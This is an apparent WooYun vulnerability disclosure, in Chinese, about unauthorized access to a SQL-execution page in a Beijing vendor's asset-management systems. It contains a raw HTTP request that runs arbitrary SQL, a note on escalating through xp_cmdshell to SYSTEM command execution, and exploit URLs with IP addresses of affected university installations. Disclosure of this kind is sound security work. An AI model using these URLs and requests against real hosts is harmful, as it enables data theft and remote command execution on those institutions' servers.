WooYun.org

公司主站：http://www.bjprd.com.cn/
公司信息：北京普诺迪信息系统技术研发有限责任公司
#越权访问导致数据泄露及命令执行
以下为其中几个存在此漏洞的系统：
家具网络管理系统
低值品网络管理系统
图书管理系统
交通管理系统
房屋及土地管理系统
仪器设备管理系统
无形资产管理系统
等
实例：
http://202.113.128.61/tsweb/

越权访问：
http://202.113.128.61/tsweb/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
可以直接访问后台的sql语句执行功能

某些语句执行后不会在下方回显结果，这里用burp抓包演示：
POST /tsweb/ebsys/eformaspx/WebBill.aspx?dataset_select HTTP/1.1
Accept: */*
Referer: http://202.113.128.61/tsweb/ebsys/fceform/dj/eb_runsql.htm
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 202.113.128.61
Content-Length: 115
DNT: 1
Proxy-Connection: Keep-Alive
Pragma: no-cache
<root><sql>select @@version</sql><pageno>1</pageno><pagesize>50</pagesize><fset></fset><fieldsql></fieldsql></root>
可以看到sql标签内执行的是sql语句

如何查询结果在<td>标签中回显
可执行任意sql语句

默认情况下为sa权限。可以直接调用xp_cmdshell执行系统命令：

可以看到成功执行了系统命令，当前为system权限。
这里列出几个其他实例：（情况均和上面一致）
南京财经大学
http://210.28.80.170/dzpWEB//
http://210.28.80.170/dzpWEB//ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
天津理工大学：
http://59.67.148.50/dzpweb/
http://59.67.148.50/dzpweb//ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
暨南大学：
http://202.116.0.158/
http://202.116.0.158/car/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
http://202.116.0.158/DzpWeb/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
天津师范大学：
http://59.67.78.170:81/
http://59.67.78.170:81/tsweb/ebsys/fceform/dj/eb_runsql.htm
等